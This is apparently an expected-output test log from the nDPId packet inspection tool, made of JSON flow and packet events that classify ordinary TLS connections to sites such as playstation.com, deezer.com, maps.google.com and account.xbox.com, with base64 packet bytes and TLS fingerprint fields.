+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1646482879566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879566,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ZJ5AAEAGuDfAqAGAFwFEvd\/4Abu+RY+DAAAAAKAC+vCgEQAAAgQFtAQCCAqibL0tAAAAAAEDAwc="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1646482879585,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879585,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGI9YXAUS9wKgBgAG73\/iES9VYvkWPhKAS\/ojG\/QAAAgQFtAQCCApEcjdUomy9LQEDAwc="} +01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1646482879590,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482879590,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5ZKBAAEAGtjjAqAGAFwFEvd\/4Abu+RY+EhEvVWYAYAfb4UwAAAQEICqJsvUREcjdUFgMBAgABAAH8AwPTmj1yotJrCU5Axy8WSqX4RbWM\/SINHTcC+qIJwwqdWyAtxwR2GOpVXqzss+L4QuffJNllYoSRruXn4YOMT1n2UQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAYABYAABN3d3cucGxheXN0YXRpb24uY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIO+m+y4kE\/Ul0wRfLnWkNqXDSHnFmA3tI1g\/5Tv\/EZwCABcAQQQh+3EFl7VEJWAHnTsK42aVbCexqYTb9DwqjdAN6Pu9IMJwjvRFdXg\/Y6aZYu3btbo89OdSMmSsifn4YkrISGSJACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482879566,"flow_last_seen":1646482879590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482879590,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":424,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482879566,"flow_last_seen":1646482879608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482879608,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"19e4a55cecd087d9ebf88da03db13a0f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482879566,"flow_last_seen":1646482879608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4380,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1646482879608,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","server_names":"playstation.com,webforms.playstation.com,www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"19e4a55cecd087d9ebf88da03db13a0f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Mateo, O=SONY INTERACTIVE ENTERTAINMENT LLC, CN=www.playstation.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"19:BC:48:84:B7:B0:91:46:45:D5:DD:3B:B5:8D:8E:45:E8:42:1A:8A"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482879964,"flow_last_seen":1646482879964,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482879964,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1646482879964,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879964,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8nmNAAEAGzLvAqAGAFzP2QbS4AbvcfW4jAAAAAKAC+vARXQAAAgQFtAQCCAo1KzXVAAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1646482879981,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879981,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgGcx8XM\/ZBwKgBgAG7tLg0LEpK3H1uJKAS\/oiOFAAAAgQFtAQCCAqG0XpXNSs11QEDAwc="} +01163{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1646482879983,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482879983,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5nmVAAEAGyrzAqAGAFzP2QbS4AbvcfW4kNCxKS4AYAfZhPwAAAQEICjUrNeiG0XpXFgMBAgABAAH8AwOVj3yfLLIdpS7ph9cCyv5vCYAGlSzvdrVr1N5tbcI94SDvfvqZxXeUOWdQ166wenjn8HB2CzcmnFG8kG7bSApHKAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAbABkAABZzdGF0aWMucGxheXN0YXRpb24uY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AID7op1onM6THMaho0vMOrhWIG6UTS6n8xwsrP6D1biscABcAQQR0Q9Knvll2eKORbkRyexBvYc7r+Q69FpqwjjnvO3KMU7d3ZPOw9jaGO1B0c9lo8UIHFSOSayE0o5gPreutfPv3ACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":431,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482879964,"flow_last_seen":1646482879983,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482879983,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":432,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482879964,"flow_last_seen":1646482879998,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482879998,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.3","client_requested_server_name":"static.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482896911,"flow_last_seen":1646482896911,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482896911,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1646482896911,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482896911,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8pPpAAEAGn8vAqAGAbIrHQ6iOAbuXn2EUAAAAAKAC+vCb0AAAAgQFtAQCCApW0sF4AAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1646482896918,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482896918,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8E58AAPcGuiZsisdDwKgBgAG7qI5txRYul59hFaAS\/\/+2KgAAAgQFoAQCCAqPYc1DVtLBeAEDAwg="} +01163{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1646482896921,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482896921,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5pPxAAEAGnczAqAGAbIrHQ6iOAbuXn2EVbcUWL4AYAfaXogAAAQEIClbSwYKPYc1DFgMBAgABAAH8AwNMrbkme+2pG6WKGaUcTfCs10ic95it0jPiimTr5KWaaiCmUwwyrZpDXgONpktntKRQJ28LAppHGUwuuBwH65AqlAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAPAA0AAApkZWV6ZXIuY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIAS3iFI+Lml2aqbJ99HMOh2pxKpjuORM+VA6AJN2jS5cABcAQQS2OgHZ7hQeCCurKRe6Z6o4CXtv3DRVG4xO7HV8XVI+fMr+wQD4VFXUBMvHu9XDFEguxQ+LZymMWbInoPBoAAbBACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482896911,"flow_last_seen":1646482896921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482896921,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"deezer.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":438,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482896911,"flow_last_seen":1646482896928,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482896928,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.3","client_requested_server_name":"deezer.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482916232,"flow_last_seen":1646482916232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482916232,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.65.82.67","src_port":52070,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1646482916232,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482916232,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ooZAAEAGcYnAqAGAEkFSQ8tmAFAueWmfAAAAAKAC+vBogwAAAgQFtAQCCApZaACoAAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1646482916249,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482916249,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8Lu8AAPcGbiASQVJDwKgBgABQy2YtbN9PLnlpoKAS\/\/+hEQAAAgQFoAQCCAqviQYeWWgAqAEDAwk="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482940480,"flow_last_seen":1646482940480,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482940480,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1646482940480,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482940480,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA806FAAEAGYWnAqAGAjvq0jpfKAbsw63pbAAAAAKAC+vDytAAAAgQFtAQCCAoU3PsAAAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1646482940487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482940487,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8FycAAHkGJGSO+rSOwKgBgAG7l8rhydulMOt6XKAS\/\/9c9AAAAgQFlgQCCAqRbEHhFNz7AAEDAwg="} +01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1646482940491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482940491,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI506NAAEAGX2rAqAGAjvq0jpfKAbsw63pc4cnbpoAYAfb+6AAAAQEIChTc+wqRbEHhFgMBAgABAAH8AwO7ribOnVQsY1sOMkcbEYXbLY3qPQQ51Elay7+WtVSrNSAVw+m3VKjUN5Kg0hk0Rcql0l9JhorDl+A6BcRaD2MOQwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAUABIAAA9tYXBzLmdvb2dsZS5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgZi1V3KN\/7YwDfK8H3VIJ+hl8oG\/pcyHsJbGlMXjOc2MAFwBBBJu4yUB5A9M8e+22tNqv37PZXfAJovqkKxk\/cRDsm65QH7HDIBoXPUoAJy1c6x2wwBosAz8dzXVrLnN4Hqic9PsAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAhwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482940480,"flow_last_seen":1646482940491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482940491,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"maps.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":444,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482940480,"flow_last_seen":1646482940513,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646482940513,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"maps.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482995689,"flow_last_seen":1646482995689,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482995689,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1646482995689,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482995689,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8enxAAEAGb8fAqAGAAhGMP78GAburV\/8MAAAAAKAC+vDqEgAAAgQFtAQCCArEqeKzAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1646482995709,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482995709,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgG8kMCEYw\/wKgBgAG7vwYhgnsXq1f\/DaAS\/ohOCgAAAgQFtAQCCAocht8\/xKniswEDAwc="} +01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1646482995711,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482995711,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5en5AAEAGbcjAqAGAAhGMP78GAburV\/8NIYJ7GIAYAfY3gAAAAQEICsSp4socht8\/FgMBAgABAAH8AwNFE1YF0dNQQhTDT2LTts3l72ip1ON6WYuBYFjp45zAOSCfsggN3rEBQ1caacueVCEG9V0G2r03kBuc\/FQ9ILx8tQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAVABMAABBhY2NvdW50Lnhib3guY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIKOdg7M8WplrJ1dHmYhafGTWEV65\/XHCmgpJRZB9OyhxABcAQQSUMlyZp7X5PylQs43MbEemG5LZD4aMK86EfSyduzhW1kr6wtZBIJI7MJb\/MCOqF0\/ebXOaYXIP5autWsClQmu8ACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 